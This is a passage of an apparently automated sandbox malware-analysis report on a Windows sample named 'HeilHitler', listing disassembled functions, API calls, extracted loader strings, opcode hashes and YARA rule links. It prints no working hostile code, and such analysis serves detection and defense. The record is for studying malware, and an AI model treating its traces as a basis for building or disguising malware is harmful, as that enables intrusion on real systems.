                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 27517122F1AA4756EB049B15A830EB97391BF44B98F484235ED6E477EDEF3CE5458300
                                                                                                                                                                                                                                            Function 00007FF633D62180 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                                                            • String ID: P%
                                                                                                                                                                                                                                            • API String ID: 2147705588-2959514604
                                                                                                                                                                                                                                            • Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                            • Instruction ID: 15a930fb3604a091e0071d4d3dfc1e71deb172d3b171f49913c23aa53b7f5003
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6C51E726608BA186D6349F36E4181BAB7A1F798B65F004225EFDF83795DF3CD085DB10
                                                                                                                                                                                                                                            Function 00007FF633D680C0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 67COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: LongWindow$BlockCreateErrorLastReasonShutdown
                                                                                                                                                                                                                                            • String ID: Needs to remove its temporary files.
                                                                                                                                                                                                                                            • API String ID: 3975851968-2863640275
                                                                                                                                                                                                                                            • Opcode ID: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
                                                                                                                                                                                                                                            • Instruction ID: 8102a2354b22de0beb218e9c40ede504b4c952b5fd5cbce5b8658eff246ae12e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5C21B721B08A4281E7418BFAE8561797250FF89F91F585330DE3ED73E9DE2CE5959300
                                                                                                                                                                                                                                            Function 00007FFDFAD62720 Relevance: 16.7, APIs: 11, Instructions: 230COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033758431.00007FFDFAD61000.00000040.00000001.01000000.00000013.sdmp, Offset: 00007FFDFAD60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033713501.00007FFDFAD60000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033758431.00007FFDFADC4000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033758431.00007FFDFAE13000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033758431.00007FFDFAE6C000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033758431.00007FFDFAE71000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033758431.00007FFDFAE74000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034059986.00007FFDFAE75000.00000080.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034101253.00007FFDFAE77000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfad60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 349153199-0
                                                                                                                                                                                                                                            • Opcode ID: 2c919d68a485a940d5d0ad5c103bd88b2e133b3e89e7b4880588334ffb64ee24
                                                                                                                                                                                                                                            • Instruction ID: 7385981c80336662c3b8f548d41b4c9318ec9d588fa3ad61f853791000a18ab1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2c919d68a485a940d5d0ad5c103bd88b2e133b3e89e7b4880588334ffb64ee24
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 38819E21F1824346F75CAB25AC71AB962A0EF89780F1840B5D96D877DEFE3CE9458700
                                                                                                                                                                                                                                            Function 00007FF633D76290 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 494COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                            • String ID: -$:$f$p$p
                                                                                                                                                                                                                                            • API String ID: 3215553584-2013873522
                                                                                                                                                                                                                                            • Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                            • Instruction ID: a1e15ba2d683aff4b89c6501d1bc6059eaef906aa9de14d71b9258e8bcd0fd10
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2B12A372E0C24386FB645E94D1562BD76A2FB50754FC84235E68DA6BC4FF3CE980AB00
                                                                                                                                                                                                                                            Function 00007FF633D70FC8 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                            • String ID: f$f$p$p$f
                                                                                                                                                                                                                                            • API String ID: 3215553584-1325933183
                                                                                                                                                                                                                                            • Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                            • Instruction ID: 566f00aa2c38b411a9e5758c010c0e7eed45ca89efc92fd79a1817dff0e078d3
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FA12B762E0C14386FB245E94E0466B977A1FB80794FD84335E69E97BC4DF3CE484AB00
                                                                                                                                                                                                                                            Function 00007FF633D61050 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 119COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CurrentProcess
                                                                                                                                                                                                                                            • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                            • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                            • Opcode ID: 5f0021a5e06caa1d5927e7faba78de093a7e02f73eeda03f06a6a07f76cf53df
                                                                                                                                                                                                                                            • Instruction ID: 51369ca1f2913a88d74bca2540edec8a31f8be4fd1f1aeef11c464701a6b4028
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5f0021a5e06caa1d5927e7faba78de093a7e02f73eeda03f06a6a07f76cf53df
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E841A861B0865282EA10DB91A8076B973A0FF44BC4F844632ED9CE7796DF3CF546A740
                                                                                                                                                                                                                                            Function 00007FFDFAF441D8 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 117networkCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2034614271.00007FFDFAF41000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFDFAF40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034579485.00007FFDFAF40000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAF4D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAFA5000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAFB9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAFC9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAFDD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB18C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB18E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB1B9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB1EA000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB210000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB25E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB264000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB266000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB282000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB28F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2035725372.00007FFDFB293000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2035764384.00007FFDFB294000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfaf40000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorLastsetsockopt
                                                                                                                                                                                                                                            • String ID: ..\s\crypto\bio\b_sock2.c$o
                                                                                                                                                                                                                                            • API String ID: 1729277954-1872632005
                                                                                                                                                                                                                                            • Opcode ID: 55b9dc58d84091389097999520ee8ef412c939128f98883080a21d6a8e2db22d
                                                                                                                                                                                                                                            • Instruction ID: 05070a034f5d0adcf09504c7ab5e9a48117d94b765d515608eed194cf445d515
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 55b9dc58d84091389097999520ee8ef412c939128f98883080a21d6a8e2db22d
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5D519F22B0954386F3209F11E424ABE73A0FB81B88F444235EAAD47AEDCF3DE545DB40
                                                                                                                                                                                                                                            Function 00007FF633D68660 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 116COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetTempPathW.KERNEL32(?,?,00000000,00007FF633D63CBB), ref: 00007FF633D68704
                                                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32(?,00000000,00007FF633D63CBB), ref: 00007FF633D6870A
                                                                                                                                                                                                                                            • CreateDirectoryW.KERNEL32(?,00000000,00007FF633D63CBB), ref: 00007FF633D6874C
                                                                                                                                                                                                                                              • Part of subcall function 00007FF633D68830: GetEnvironmentVariableW.KERNEL32(00007FF633D6388E), ref: 00007FF633D68867
                                                                                                                                                                                                                                              • Part of subcall function 00007FF633D68830: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF633D68889
                                                                                                                                                                                                                                              • Part of subcall function 00007FF633D78238: _invalid_parameter_noinfo.LIBCMT ref: 00007FF633D78251
                                                                                                                                                                                                                                              • Part of subcall function 00007FF633D62810: MessageBoxW.USER32 ref: 00007FF633D628EA
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
                                                                                                                                                                                                                                            • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                                                                                                                                                            • API String ID: 3563477958-1339014028
                                                                                                                                                                                                                                            • Opcode ID: 881e4fca8e19ec4ab2ebb52834f4ac375ff8f2bae867f31c8bf391ae1f14406c
                                                                                                                                                                                                                                            • Instruction ID: 75af0323ff9a80efafbbee8e034c6139ae6b0d248ea7fffc3df1f4c364d7745c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 881e4fca8e19ec4ab2ebb52834f4ac375ff8f2bae867f31c8bf391ae1f14406c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A341A421A1964284FA10ABE5A8672B963A1AF847C1FC05331ED1DFB7DADE3CE545E340
                                                                                                                                                                                                                                            Function 00007FF633D6EA08 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                            • String ID: csm$csm$csm
                                                                                                                                                                                                                                            • API String ID: 849930591-393685449
                                                                                                                                                                                                                                            • Opcode ID: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
                                                                                                                                                                                                                                            • Instruction ID: fb1b30cd20393363f9eab9516b10b03b0fc1f1707cefceac0430de3548b9ee72
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4CD1D432A08B4186EB20DFA5D5423AD37A0FB54788F900335EE5DA77AADF38E095D740
                                                                                                                                                                                                                                            Function 00007FF633D7ED10 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?,?,?,00007FF633D7F0AA,?,?,000001BD40F26958,00007FF633D7AD53,?,?,?,00007FF633D7AC4A,?,?,?,00007FF633D75F3E), ref: 00007FF633D7EE8C
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,?,?,00007FF633D7F0AA,?,?,000001BD40F26958,00007FF633D7AD53,?,?,?,00007FF633D7AC4A,?,?,?,00007FF633D75F3E), ref: 00007FF633D7EE98
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                            • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                            • API String ID: 3013587201-537541572
                                                                                                                                                                                                                                            • Opcode ID: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                                                                                                                                                                                                            • Instruction ID: 1c2119cbf279b8d7d58f80f071047de15deef92be4f66182e6d03bbbaf58a44b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BD412821B29A1281FB15CF96AC126752391BF49BD0F894739DD1DEB7A4EF3CE415A300
                                                                                                                                                                                                                                            Function 00007FF633D62C50 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 104windowCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF633D63706,?,00007FF633D63804), ref: 00007FF633D62C9E
                                                                                                                                                                                                                                            • FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF633D63706,?,00007FF633D63804), ref: 00007FF633D62D63
                                                                                                                                                                                                                                            • MessageBoxW.USER32 ref: 00007FF633D62D99
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Message$CurrentFormatProcess
                                                                                                                                                                                                                                            • String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
                                                                                                                                                                                                                                            • API String ID: 3940978338-251083826
                                                                                                                                                                                                                                            • Opcode ID: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
                                                                                                                                                                                                                                            • Instruction ID: e887b4e9ee61f3d6761854eb8504e09a25780305fe5106c886124e6aca3dbb07
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 79310832708B4142E7209BA5B8152BA7791BF88B88F810236EF5DE7759EF3CE516D700
                                                                                                                                                                                                                                            Function 00007FFDFAF460CD Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 227COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2034614271.00007FFDFAF41000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFDFAF40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034579485.00007FFDFAF40000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAF4D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAFA5000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAFB9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAFC9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAFDD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB18C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB18E000.00000040.00000001.01000000.0000000F.sdmpDownload File
